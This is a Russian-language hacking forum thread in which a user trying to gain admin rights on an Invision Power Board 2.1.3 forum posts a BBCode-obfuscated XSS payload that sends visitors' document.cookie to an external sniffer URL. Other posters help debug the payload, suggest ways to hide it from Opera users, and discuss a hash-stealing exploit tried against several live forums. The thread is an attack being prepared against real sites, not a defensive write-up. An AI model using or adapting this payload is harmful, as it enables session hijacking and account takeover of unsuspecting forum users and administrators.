Как спрятать сниффер под Opera в Ipb 2.1.3
 

Есть форум Invision Power Board v2.1.3
Проблема - достать права Админа.. =(

Главная проблема в том, что ВСЕ! коды видно в Опере...

Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер...

Вот сам коД:

[COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1] .src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR]

Кто скажет, в чем проблема ? Почему код не работает?...

Заранее спасибо.

А ещё варианты есть какие нить??? Попробуй сплойтом.
И ещё, дай ссылку на сайт, я посмотрю.

Просто сплойт почему-то не работает =( Пробовал на 8 форумах ИПБ, нигде не находил хэши...
Может проблема в сплойте... я это $allchar .= chr($char); исправил, но он все-равно не работает... провил и на $allchar .= chr($i);

А в КОДе выше в чем может быть проблема ?


Вот сайт :

http://www.ссылки в личку!.com/forum/index.php?

Кстати, может быть проблема в этом ??
Что я после src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) ---> ; не поставил ?
Типа так : src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);

???

Найдена XSS
alert
cookie
Звёздочки поубирай в тэгах.

Я только что проверял, всё работает... Барсик, ты чего.... Вот только что проверял!

Неее... Сплойтом не пробывал, так быстренько, на скорую руку посмотрел, XSS есть, читай статью WJ...
Она поможет...
Незабываем про репутацию! ;)

Блин, в Опере всеравно коды отображаются =(

А реально что-то сделать в том коде, что-бы и в Опере его небыло видно ?

У меня не работает :(
Что не так сделал?
www.barsik.jino-net.ru/forum.jpg
В опере нельзя сделать, но можно код спрятать
Под цвет фона

Ошибочка у тебя на скрине по мойму
Попробуй так:

Нет даже так не работает. Ну ладно ничего страшного :)